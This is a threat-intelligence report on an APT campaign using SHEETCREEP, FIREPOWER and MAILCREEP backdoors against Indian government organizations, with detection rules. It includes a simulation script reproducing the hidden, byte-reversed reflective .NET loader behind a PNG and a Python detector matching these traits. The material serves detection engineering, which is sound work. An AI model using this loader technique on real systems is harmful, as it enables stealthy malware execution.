SOC Prime Bias: Critical

30 Jan 2026 16:58 UTC

APT Attacks Target Indian Government Using SHEETCREEP, FIREPOWER, and MAILCREEP | Part 2

Ruslan Mikhalov, Chief of Threat Research at SOC Prime

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Summary

The report covers the Sheet Attack operation, which deployed three custom backdoors (SHEETCREEP, FIREPOWER, and MAILCREEP) to compromise Indian government organizations. The implants relied on legitimate cloud platforms for command and control, including Google Sheets, Firebase Realtime Database, and the Microsoft Graph API, which helped the activity blend into normal SaaS traffic. The analysis also notes artifacts consistent with the developers using generative AI to assist in producing the code. The campaign is assessed as likely linked to a Pakistan-based subgroup of APT36.

Investigation

ThreatLabz conducted dynamic and static analysis of the backdoors, documenting their persistence methods, C2 workflows, and data exfiltration behavior. The team also mapped the supporting infrastructure, observed filtering based on geography and User-Agent, and captured code-level indicators suggesting AI-assisted code generation.

Mitigation

Implement layered detections for suspicious PDF/LNK delivery chains and monitor scheduled tasks that launch PowerShell or VBS execution. Apply strict egress controls and anomaly monitoring for cloud services commonly abused as C2, including Google Sheets, Firebase, and Microsoft Graph. Use hash-based blocking for known payloads and block the identified malicious domains and IP addresses.

Response

Once detected, isolate the endpoint, terminate the hidden cmd.exe and PowerShell activity, remove the related scheduled tasks, and delete the backdoor binaries. Preserve and review the Google Sheets-based C2 logs and Firebase artifacts, then hunt for other hosts in the environment exhibiting the same indicators.

Detections

Download or Upload via Powershell (via cmdline)

SOC Prime Team
29 Jan 2026

Microsoft Graph API Domain Resolved By Unusual Process (via dns_query)

SOC Prime Team
29 Jan 2026

Suspicious Files in Public User Profile (via file_event)

SOC Prime Team
29 Jan 2026

Suspicious GNU Wget Execution Attempt (via cmdline)

SOC Prime Team
29 Jan 2026

Call Suspicious .NET Methods from Powershell (via powershell)

SOC Prime Team
29 Jan 2026

Suspicious Execution from Public User Profile (via process_creation)

SOC Prime Team
29 Jan 2026

Possible Data Infiltration / Exfiltration / C2 via Third Party Services / Tools (via dns)

SOC Prime Team
29 Jan 2026

Suspicious Extracted Files from an Archive (via file_event)

SOC Prime Team
29 Jan 2026

IOCs (SourceIP) to detect: APT Attacks Target Indian Government Using SHEETCREEP, FIREPOWER, and MAILCREEP | Part 2

SOC Prime AI Rules
29 Jan 2026

IOCs (HashMd5) to detect: APT Attacks Target Indian Government Using SHEETCREEP, FIREPOWER, and MAILCREEP | Part 2

SOC Prime AI Rules
29 Jan 2026

IOCs (DestinationIP) to detect: APT Attacks Target Indian Government Using SHEETCREEP, FIREPOWER, and MAILCREEP | Part 2

SOC Prime AI Rules
29 Jan 2026

IOCs (HashSha1) to detect: APT Attacks Target Indian Government Using SHEETCREEP, FIREPOWER, and MAILCREEP | Part 2

SOC Prime AI Rules
29 Jan 2026

IOCs (HashSha256) to detect: APT Attacks Target Indian Government Using SHEETCREEP, FIREPOWER, and MAILCREEP | Part 2

SOC Prime AI Rules
29 Jan 2026

Detection of PowerShell Commands for SHEETCREEP and FIREPOWER Backdoor Deployment [Windows Powershell]

SOC Prime AI Rules
29 Jan 2026

Detection of SHEETCREEP and FIREPOWER Backdoor C2 Communication [Windows Network Connection]

SOC Prime AI Rules
29 Jan 2026

Simulation Execution

Prerequisite: The Telemetry & Baseline Pre-flight Check must have passed.

Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic. Abstract or unrelated examples will lead to misdiagnosis.

  • Attack Narrative & Commands:

    1. Stage the malicious PNG:
      • The attacker creates a PNG file (details.png) that actually contains a compiled .NET assembly byte stream, with its bytes reversed to evade static analysis.
    2. Launch PowerShell in hidden mode to load the assembly:
      • The attacker runs PowerShell with -WindowStyle Hidden -Command and a one-liner that reads the reversed bytes, restores the correct order, loads the assembly via [System.Reflection.Assembly]::Load(), and invokes a known entry point (Task10.Program::MB()).
    3. Alternative LNK-based FIREPOWER deployment:
      • A crafted .lnk shortcut executes powershell.exe with --headless -e (encoded script) to fetch and run a remote PowerShell backdoor.

    These steps exactly match the strings the Sigma rule is looking for, ensuring the alert fires.

  • Regression Test Script:

    # -------------------------------------------------
    # SHEETCREEP payload simulation - reproduces the exact command line
    # -------------------------------------------------
    
    # 1. Create a dummy .NET assembly that exposes the Task10.Program::MB entry point
    #    invoked by the simulated command line, and compile it
    $source = @"
    using System;
    namespace Task10 {
        public class Program {
            public static void MB() {
                Console.WriteLine("Payload executed");
            }
        }
    }
    "@
    $tempDir = Join-Path $env:TEMP "sheetcreep"
    New-Item -ItemType Directory -Force -Path $tempDir | Out-Null
    $csFile  = Join-Path $tempDir "Task10.cs"
    $dllFile = Join-Path $tempDir "Task10.dll"
    $source | Set-Content -Path $csFile -Encoding UTF8
    
    # Compile using csc (assumes the .NET Framework 4.x compiler is present)
    $cscPath = Join-Path $env:WINDIR "Microsoft.NET\Framework64\v4.0.30319\csc.exe"
    & $cscPath /nologo /target:library /out:$dllFile $csFile
    
    # 2. Read the DLL bytes, reverse them, and write them out as details.png
    $bytes = [IO.File]::ReadAllBytes($dllFile)
    $revBytes = $bytes[($bytes.Length-1)..0]
    $pngPath = Join-Path $tempDir "details.png"
    [IO.File]::WriteAllBytes($pngPath, $revBytes)
    
    # 3. Execute the exact PowerShell command line the rule looks for (this will fire the rule).
    #    The inner script uses single quotes (doubled inside this single-quoted string) so the
    #    command line survives argument parsing intact; $b is not expanded by the outer shell.
    $maliciousCmd = '-WindowStyle Hidden -Command "$b=[IO.File]::ReadAllBytes(''details.png'');' +
                    '([System.Reflection.Assembly]::Load([byte[]]($b[($b.Length-1)..0])).GetType(''Task10.Program'')::MB())"'
    
    # details.png is referenced by a relative path, so the child runs from $tempDir.
    # -NoNewWindow cannot be combined with -WindowStyle on Start-Process, so only the latter is used.
    Start-Process -FilePath (Join-Path $env:SystemRoot "System32\WindowsPowerShell\v1.0\powershell.exe") `
                  -ArgumentList $maliciousCmd `
                  -WorkingDirectory $tempDir `
                  -WindowStyle Hidden `
                  -Wait
    
    # Cleanup (optional, run after verification)
    # Remove-Item -Recurse -Force $tempDir
  • Cleanup Commands:

    # Remove temporary files and directories created for the test
    $tempDir = Join-Path $env:TEMP "sheetcreep"
    if (Test-Path $tempDir) {
        Remove-Item -Recurse -Force $tempDir
    }
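The mitigation guidance above (monitor PowerShell launches and watch for unexpected processes resolving Google Sheets, Firebase and Microsoft Graph) and the simulation narrative (the command-line traits the rule keys on) can be exercised with a small detection pass over sample telemetry. The following Python is an added example written for this page, not SOC Prime's rule content and not code from the report; the event layout, the allow-list of cloud clients, the file paths and the base64 blob are assumptions or constructed samples.

```python
"""Detection pass over constructed Windows telemetry for the TTPs described above.

Added example: this is not SOC Prime's rule logic or the report's code. The
event layout (dicts with event_type, image, command_line, query_name) is an
assumption modelled loosely on Sysmon process_creation / dns_query fields.
"""
import re

# Cloud services the report names as abused for C2.
CLOUD_C2_DOMAINS = ("sheets.googleapis.com", "firebaseio.com", "graph.microsoft.com")

# Processes for which talking to those services is normal (assumption; tune per
# environment; a real rule would maintain this as a reviewed allow-list).
EXPECTED_CLOUD_CLIENTS = {
    "outlook.exe", "excel.exe", "teams.exe", "onedrive.exe", "msedge.exe", "chrome.exe",
}

# Command-line traits taken from the simulation narrative: hidden window,
# reflective Assembly.Load of a byte-reversed blob, and headless + encoded script.
HIDDEN_WINDOW = re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)
REFLECTIVE_LOAD = re.compile(r"\[System\.Reflection\.Assembly\]::Load\(", re.I)
BYTE_REVERSAL = re.compile(r"\[\s*\(\s*\$\w+\.Length\s*-\s*1\s*\)\s*\.\.\s*0\s*\]", re.I)
HEADLESS_ENCODED = re.compile(r"--headless\b.*?\s-e(?:nc|ncodedcommand)?\b", re.I)


def image_name(event):
    """Lower-cased file name of the originating process."""
    return event.get("image", "").rsplit("\\", 1)[-1].lower()


def check_process_creation(event):
    """Return the list of findings for one process_creation event."""
    findings = []
    if image_name(event) not in ("powershell.exe", "pwsh.exe"):
        return findings
    cmd = event.get("command_line", "")
    if HIDDEN_WINDOW.search(cmd) and REFLECTIVE_LOAD.search(cmd):
        findings.append("hidden PowerShell loading an assembly from bytes")
        if BYTE_REVERSAL.search(cmd):
            findings.append("byte-reversed payload (SHEETCREEP-style loader)")
    if HEADLESS_ENCODED.search(cmd):
        findings.append("headless PowerShell with encoded script (FIREPOWER-style LNK chain)")
    return findings


def check_dns_query(event):
    """Flag resolution of an abused cloud C2 domain by a process not expected to use it."""
    name = event.get("query_name", "").lower()
    proc = image_name(event)
    abused = any(name == d or name.endswith("." + d) for d in CLOUD_C2_DOMAINS)
    if abused and proc not in EXPECTED_CLOUD_CLIENTS:
        return [f"{name} resolved by unexpected process {proc}"]
    return []


HANDLERS = {"process_creation": check_process_creation, "dns_query": check_dns_query}


def triage(events):
    """Run the matching handler over each event; return (event index, finding) pairs."""
    alerts = []
    for idx, event in enumerate(events):
        handler = HANDLERS.get(event.get("event_type"))
        for finding in (handler(event) if handler else []):
            alerts.append((idx, finding))
    return alerts


# Constructed sample telemetry (not real captures): paths and the base64 blob are made up.
SAMPLE_EVENTS = [
    {"event_type": "process_creation",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe -WindowStyle Hidden -Command \"$b=[IO.File]::ReadAllBytes('details.png');"
                     "([System.Reflection.Assembly]::Load([byte[]]($b[($b.Length-1)..0])).GetType('Task10.Program')::MB())\""},
    {"event_type": "process_creation",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe --headless -e ZgBhAGsAZQA="},  # blob is UTF-16LE 'fake' (constructed)
    {"event_type": "process_creation",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": r"powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\scripts\inventory.ps1"},
    {"event_type": "dns_query", "image": r"C:\Users\Public\svc\update.exe",
     "query_name": "sheets.googleapis.com"},
    {"event_type": "dns_query", "image": r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE",
     "query_name": "graph.microsoft.com"},
    {"event_type": "dns_query", "image": r"C:\Users\Public\svc\update.exe",
     "query_name": "example-rtdb.firebaseio.com"},
]

if __name__ == "__main__":
    for idx, finding in triage(SAMPLE_EVENTS):
        print(f"event {idx}: {finding}")
```

Run as-is it reports five findings: two for the hidden reflective loader, one for the headless encoded launch, and one each for the two cloud C2 resolutions from the unexpected process, while the benign scripted PowerShell run and Outlook's Graph lookup stay silent. The domain check is deliberately a process allow-list rather than a domain block-list, since blocking Google Sheets or Microsoft Graph outright is rarely an option; in production the same logic belongs in the SIEM rule language rather than a script.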